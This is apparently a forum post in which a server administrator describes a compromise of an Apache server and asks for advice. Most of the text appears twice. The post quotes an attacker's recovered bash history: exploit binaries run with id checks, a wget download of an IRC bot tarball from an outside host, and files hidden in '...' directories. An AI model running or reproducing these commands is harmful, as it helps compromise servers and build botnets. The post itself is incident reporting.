Sigh. I've been experiencing some weird things going on on my server and over the past few days have been investigating what is going on. It started when I noticed SSL errors in my error log complaining about wrong connection ids and OpenSSL errors. I eventually found:
http://www.auscert.org.au/render.html?it=2409
...which seemed to be related, so I upgraded OpenSSL to the latest version but the errors persisted.
Then I started noticing strange processes like:
./mech
./a /cgi-bin/moo.cgi
I noticed that updatedb was running but was excluding all the temp directories like /tmp and /var/tmp so I went into those directories and found a load of C files with compiled binaries. Ironically there were readme's with all the files which (luckily) told me exactly what the files were doing....running an IRC bot.
So I deleted all the files and killed the processes. I then checked for hidden files and found a load more including a bash history in /var/tmp which looked like:
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
./sxp2
./epc
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
cd /tmp/.k/xp
./sxp2
cd /tmp
rm -rf .k
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
cd /tmp/.k/xp
./sxp3
wget www.lordofdesire.net/smen/smenemech.tar.gz
tar zxvf smenemech.tar.gz
rm -rf smenemech.tar.gz
cd emech-2.8.4
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
cd ..
ls
mv emech-2.8.4 ...
cd ..
cd /tmp
mv .k k
mv k ...
ls
ls -la
cd /tmp/.k/xp
./sxp2
./ptr
id
./epc
id
Big sigh.
So I deleted everything and changed my root password. I'm at a loss as to how they are getting in. All the hacker files are owned by apache/apache so as a quick, dirty solution I have changed the permissions on the tmp directories so apache can't read/write.
I don't know whether I should completely restore redhat or not.
http://www.auscert.org.au/render.html?it=2409
...which seemed to be related, so I upgraded OpenSSL to the latest version but the errors persisted.
Then I started noticing strange processes like:
./mech
./a /cgi-bin/moo.cgi
I noticed that updatedb was running but was excluding all the temp directories like /tmp and /var/tmp so I went into those directories and found a load of C files with compiled binaries. Ironically there were readme's with all the files which (luckily) told me exactly what the files were doing....running an IRC bot.
So I deleted all the files and killed the processes. I then checked for hidden files and found a load more including a bash history in /var/tmp which looked like:
Quote:
cd /tmp/.k/xp export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
./sxp2
./epc
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
cd /tmp/.k/xp
./sxp2
cd /tmp
rm -rf .k
export HOME=/tmp
export SHELL=/bin/bash
export TERM=xterm
/bin/bash -i
cd /tmp/.k/xp
./sxp3
wget www.lordofdesire.net/smen/smenemech.tar.gz
tar zxvf smenemech.tar.gz
rm -rf smenemech.tar.gz
cd emech-2.8.4
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
./mech
cd ..
ls
mv emech-2.8.4 ...
cd ..
cd /tmp
mv .k k
mv k ...
ls
ls -la
cd /tmp/.k/xp
./sxp2
./ptr
id
./epc
id
Big sigh.
So I deleted everything and changed my root password. I'm at a loss as to how they are getting in. All the hacker files are owned by apache/apache so as a quick, dirty solution I have changed the permissions on the tmp directories so apache can't read/write.
I don't know whether I should completely restore redhat or not.
